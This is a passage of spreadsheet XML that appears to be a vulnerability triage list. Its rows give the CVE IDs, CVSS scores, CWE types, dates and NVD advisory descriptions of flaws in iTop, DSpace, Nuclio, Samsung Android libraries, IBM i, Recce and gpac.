          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in pages/tagadmin.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31803</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31880</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the universal search. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31880</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49832</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. From versions 8.0-rc1 to before 8.4, versions 9.0-rc1 to before 9.3, and version 10-rc1, Remote Code Execution (RCE) is possible via Velocity Templates used by DSpace for COAR Notify/LDN messages. This issue has been patched in versions 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49832</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52831</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.4, the Nuclio controller builds a curl invocation string for each cron trigger and stores it as the args of a Kubernetes CronJob container (/bin/sh, -c, &lt;command&gt;). Two fields in the trigger specification flow into this string without adequate sanitization: event.headers keys and event.body. This issue has been patched in version 1.16.4.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52831</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52833</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.5, Nuclio's Java runtime generates a build.gradle file during function builds using Go's text/template package. The template renders runtimeAttributes.repositories[] values with the {{ . }} action, which performs no escaping. An attacker can embed a closing brace (}) to break out of the repositories {} block and append arbitrary Groovy statements that execute unconditionally during the Gradle configuration phase. This issue has been patched in version 1.16.5.</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52833</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79755</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, on the Nuclio local Docker platform, the function namespace is interpolated—unvalidated—into a double-quoted docker ps --filter "label=nuclio.io/namespace=&lt;value&gt;" command that is executed via the host shell (/bin/sh -c). Because the default auth kind is nop (unauthenticated), a remote attacker can inject arbitrary OS commands that run as root inside the dashboard container, which holds the Docker socket → host compromise. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="S408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79755</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44629</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>security@genetec.com</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr"/>
      <c r="Q409" s="5" t="inlineStr">
        <is>
          <t>CWE-922</t>
        </is>
      </c>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>Improper access control to the Synergis Softwire installation folder. This vulnerability affects Streamvault all-in-one appliances (SV-100E and SV-300E series) and Synergis Softwire installed on Windows servers.</t>
        </is>
      </c>
      <c r="S409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44629</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17499</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr"/>
      <c r="Q410" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21087</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr"/>
      <c r="Q411" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libmdnie.so prior to SMR Sep-2026 Release 1 allows local attackers to execute arbitrary code with system server privilege.</t>
        </is>
      </c>
      <c r="S411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21087</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21088</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr"/>
      <c r="Q412" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in loading a subtitle frame in libsubextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21088</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21089</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr"/>
      <c r="Q413" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in removing style tag in libsubextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21089</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21090</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr"/>
      <c r="Q414" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libsaviextractor.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21090</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21091</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr"/>
      <c r="Q415" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libcodec2secevrcdec.so prior to SMR Sep-2026 Release 1 allows local attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21091</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30512</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr"/>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr"/>
      <c r="Q416" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability exists in the Restricted Access (Kiosk) Mode implementation of Scheidt &amp; Bachmann entervo HMI prior to V2 R5 P0 M5. The vulnerability affects the external PDF viewer functionality used to display the application manual and its interaction with the underlying Windows operating system. An authenticated low-privileged user can escape the kiosk environment by opening the application manual in the external PDF viewer and abusing the print functionality. Successful exploitation allows execution of arbitrary commands outside the kiosk environment with local administrator privileges.</t>
        </is>
      </c>
      <c r="S416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30512</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45200</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr"/>
      <c r="Q417" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>Software installed and run as a non-privileged user may conduct improper GPU driver IOCTL calls to create an allocation scenario that when freed would cause double free and kernel heap corruption.
Scenario caused by fabricating a specific combination of flags on the allocation interface that would cause an incorrect double free event when freed.</t>
        </is>
      </c>
      <c r="S417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45200</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49360</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr"/>
      <c r="Q418" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>Recce is a data-validation toolkit for enhanced dbt (data build tool) PR review. Prior to version 1.50.0, OSS server deployments that expose the server to an untrusted network without authentication are vulnerable to unauthenticated SQL execution through the query run API. When Recce is configured with a DuckDB-backed project, an attacker can use DuckDB filesystem primitives to read and write files accessible to the Recce server process. The impact depends on how Recce is deployed, but may include disclosure of local files, tampering with Recce/dbt artifacts, modification of browser-served static files leading to stored XSS, and modification of application files if those paths are writable. If Recce is run as root, file access occurs with root privileges inside that host or container. This issue has been patched in Recce `v1.50.0`. Users should upgrade to Recce `v1.50.0` or later. The patch restricts unsafe file read/write behavior for DuckDB-backed query execution and hardens the affected query path. Other warehouse adapters have also been reviewed for similar exposure. Users who cannot upgrade immediately should avoid exposing `recce server` to the public internet or any untrusted network. Recommended mitigations include enabling authentication or placing Recce behind an authenticated reverse proxy/VPN, running Recce as a non-root user, using a read-only application filesystem where possible, and ensuring that sensitive files or credentials are not available to the Recce process.</t>
        </is>
      </c>
      <c r="S418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49360</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52489</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr"/>
      <c r="Q419" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in gpac 31becc9e08b88e525a4a62013a4000de1c0f8fd9 allows an attacker to execute arbitrary code via the svgNameToImplementationName() function</t>
        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52489</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
